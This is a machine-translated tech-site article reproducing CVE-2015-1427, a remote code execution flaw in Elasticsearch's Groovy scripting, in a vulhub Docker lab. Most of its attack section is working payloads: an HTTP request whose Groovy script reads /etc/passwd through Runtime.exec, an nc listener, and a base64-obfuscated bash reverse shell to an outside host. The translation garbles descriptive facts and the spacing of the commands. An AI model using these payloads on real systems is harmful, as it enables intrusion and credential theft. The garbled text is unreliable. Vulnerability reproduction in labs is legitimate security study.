In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-06 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)05/31 Report--
This article is about how to analyze the recurrence of ElasticSearch Groovy remote code execution vulnerability CVE-2015-1427. The editor thinks it is very practical, so I share it with you. I hope you can get something after reading this article. Let's take a look at it.
Elasticsearch is a Lucene-based search server. It provides a full-text search engine with distributed multi-user capability, based on RESTful web interface. Developed in the Apache language and released as open source under the Apache license terms, Java is a popular enterprise search engine.
A remote code execution vulnerability (CVE-2014-3120) was exposed in 2014 because the script engine used by ElasticSearch supports script code MVEL for data manipulation as expressions, allowing attackers to execute arbitrary java code through MVEL constructs.
Later, the scripting language engine was replaced by Groovy, and sandboxie was added to control, so the dangerous code would be intercepted. As a result, sandboxie's lax restrictions led to remote code execution this time.
Impact range of vulnerabilities: Elasticsearch 1.3.0-1.3.7 | 1.4.0-1.4.2
This paper only records and implements the vulnerability recurrence, and the utilization process is as follows:
I. Construction of loophole environment
The vulnerability environment in this article is built with vulhub. Execute the following command to open the environment.
Cd / elasticsearch/CVE-2015-1427docker-compose builddocker-compose up-d
Access port 9200 after execution, which is shown as follows:
Vulnerability link: http://192.168.101.152:9200/
Second, the recurrence of loopholes
To exploit this vulnerability, first of all, at least one piece of data exists in ElasticSearch, and the following packets are sent to add data
POST / website/blog/ HTTP/1.1Host: 192.168.101.152:9200Content-Length: 21 {"name": "test"}
Return 201 to indicate that the addition is successful, and then send the following packet to execute the command
POST / _ search?pretty HTTP/1.1Host: 192.168.101.152:9200Content-Length: 410 {"size": 1 "script_fields": {"test#": {"script": "java.lang.Math.class.forName (\" java.io.BufferedReader\ ") .getConstructor (java.io.Reader.class) .newInstance (java.lang.Math.class.forName (\" java.io.InputStreamReader\ ") .getConstructor (java.io.InputStream.class) .newInstance (java.lang.Math.class.forName (\" java.lang.Runtime\ ") .getRuntime () .exec (\" cat / etc ") / passwd\ ") .getInputStream ()) .readLines ()" Lang: "groovy"}
Command executed successfully
To facilitate the bounce of shell to the server
Server executes nc-lvvp listening port
Then execute the following command to rebound shell
Bash-c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4NDEgMD4mMQ==} | {base64,-d} | {bash,-i}
Rebound successfully
The above is how to analyze the recurrence of ElasticSearch Groovy remote code execution vulnerability CVE-2015-1427. The editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.